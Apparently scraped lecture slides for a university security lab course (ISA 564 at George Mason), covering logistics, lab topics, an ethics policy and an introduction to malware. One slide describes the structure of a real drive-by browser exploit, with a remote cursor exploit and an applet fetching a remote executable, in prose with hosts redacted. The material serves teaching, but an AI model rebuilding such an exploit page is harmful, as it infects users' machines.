Security Laboratory

by: Federico Kerluke

Security Laboratory ISA 564

Angelos Stavrou


This 20 page Class Notes was uploaded by Federico Kerluke on Monday September 28, 2015. The Class Notes belongs to ISA 564 at George Mason University taught by Angelos Stavrou in Fall. Since its upload, it has received 26 views. For similar materials see /class/215090/isa-564-george-mason-university in Information Security Assurance at George Mason University.


Date Created: 09/28/15
ISA 564 SECURITY LAB
Class Mechanics
Angelos Stavrou, George Mason University

Course Mechanics
- Course URL: http csgmuedu astavrou isa564 S09html
- Instructor: Angelos Stavrou
  Email: astavrou@gmu.edu
  Office: Science and Tech II 441
  Office Phone: 703 9931659 & 3772
  Office Hours: Wednesday 3:30-4:30pm, Wednesday 7:10-8:10pm, and by appointment

Course Mechanics
- Course URL: http csgmuedu astavrou isa564 S09html
- TA: Haris Andrianakis
  Email: candrian@gmu.edu
  Office: Lab in ST II 460
  Office Hours: Thursday 5:00pm-7:00pm
- TA: Eunjung Yoon
  Email: eyoon2@gmu.edu
  Office: TA room in ST II 3rd floor
  Office Hours: Monday 4:30pm-6:30pm

Course Overview
- Provide hands-on experience with commodity software and their vulnerabilities in a live laboratory environment
- Experiment with Attacks against Networks and Machines
- Defenses: Forensics and diagnostics for security
- Install and Test Defenses, including Intrusion and anomaly detection Systems (IDS)
- Examine the functionality of Botnets, Malware, anti-virus, anti-spyware

Prerequisites
- Courses: No
- Skills:
  - Familiar or comfortable with Linux
  - C and ASM knowledge is a plus
  - Willingness to invest time in the lab learning about exploits, defenses and tools
  - Being able to install programs and work in unix and windows environment

Course Topics (tentative)
- Introduction / Lab Environment: be able to run experiments at home
- Software Vulnerabilities: What are the popular attack targets?
- Malware Design & Economics: How? What? Why?
- Network Attacks, Wireless & VoIP: Effectiveness, ease of deployment, traceability

Course Topics (tentative)
- Defenses I: Intrusion and Anomaly Detection. Capabilities, Ease of use, Limitations
- Defenses II: Traffic Analysis & Adaptive Firewalls. Can we characterize traffic inside an organization?
- Defenses III: Host-based Defenses. Host-based Containment architectures; Full Virtualization vs. paraVirtualization vs. Lightweight Process Containers
- Other Hot Topics: Emerging infection vectors; Virtualization (OpenVZ, Linux Vservers); Advanced malware (e.g. rootkits, botnets)

Course Grading: Class
- Lab 1: M loit
- Lab 2: Malware & Shellcode
- Lab 3: Network Attacks
- Lab 4: Traffic Analysis & Intrusion Detection
- Lab 5: Host-based Attack Containment
- Lab 6: XSS, SQL Injection Attacks, Defenses
- Team (3-4)
- Total

Course Grading: Class Project
- What Project? This is just a class
- Teams of 3-4 students working on the same topic
- Project Topics will be available online
  - You can also propose your own
- Research Project
- Study of an Existing System
- Requirements:
  - Report at the end of the semester (30)
  - In-class Presentation (10)
  - Students vote for the best and worst project
- No actual coding is required

Course Policies
- Academic integrity
  - Read the GMU honor code
  - I want you to collaborate and ask questions, however:
  - Unless otherwise noted, work turned in should reflect your independent capabilities
  - If unsure, note / cite sources and help
- Usually no late submissions will be accepted
  - You will be given two weeks to submit your work
  - No penalty for documented emergency (e.g. medical) or by prior arrangement in special circumstances

Warning
- Policy on security experiments:
  - you may not break into machines that are not your own
  - you may not attempt to attack or subvert system security on machines not owned by you
  - you can collaborate but not copy or outsource your work

Class Survey
- Introduce yourself
  - Name
  - Enrolled program
  - Your advisor, if you are a PhD student
- Background
  - Programming in Linux
  - If a PhD student, which year in the program
- Personal experience
  - Security
- Expected goal
  - Why you are interested in taking this course

ISA 564 SECURITY LAB
Introduction
Angelos Stavrou, George Mason University

Motivation
- Internet malware remains a top threat
  - Malware: Virus, worms, rootkits, spyware, bots

[Slide image: The Register article "US credit card payment house breached by sniffing malware: Suspicious activity in the Heartland", January 2009, on the Heartland Payment Systems breach]

Motivation

[Slide image: two Dark Reading articles: "Slow And Silent Targeted Attacks On The Rise" and an article on a botnet using the inauguration to get users to download malware (Waledac Trojan)]

Types of Attacks
- Browser and Binary Malware
  - Viruses, worms, and trojan horses
  - Attacks by hijacking of authentication credentials
- Browser Exploits
- Denial of Service
- Data Exfiltration
- Email attacks
- Active & Passive Traffic Analysis
- Voice over IP attacks
- Wireless attacks

An Attack Incident Against IE Browser
- One click on a malicious URL (host and path redacted on the slide)
- Result:

[Slide: HTML source returned by the malicious URL, with hostnames redacted and annotations MS05-002 and MS03-011. It contains a style rule that sets CURSOR to a remote URL, an APPLET tag with ARCHIVE 'count.jar' and CODE 'BlackBox.class' whose 'url' parameter points to a remote win32.exe, and a script that uses document.write inside try/catch to emit an obfuscated object tag of type text/x-scriptlet.]

[Figure: URL-level Topology Graph for WinXP SP1 Unpatched: 688 URLs from 270 sites. Legend: site nodes (Content Provider, Exploit Provider); URLs (Redirecting URL, Exploiting URL)]

Motivation Example
- Third Party Code (e.g. visit counter)

[Slide: "basic code" JavaScript snippet for a third-party visit counter, loaded from a redacted statistics host, followed by a list of URLs ending in an .exe file]

Course Focus
- Understanding essential techniques behind these attacks, offensively and defensively
- Experiment with the tools, existing malware and defenses
- Learn how to use existing or write your own working code

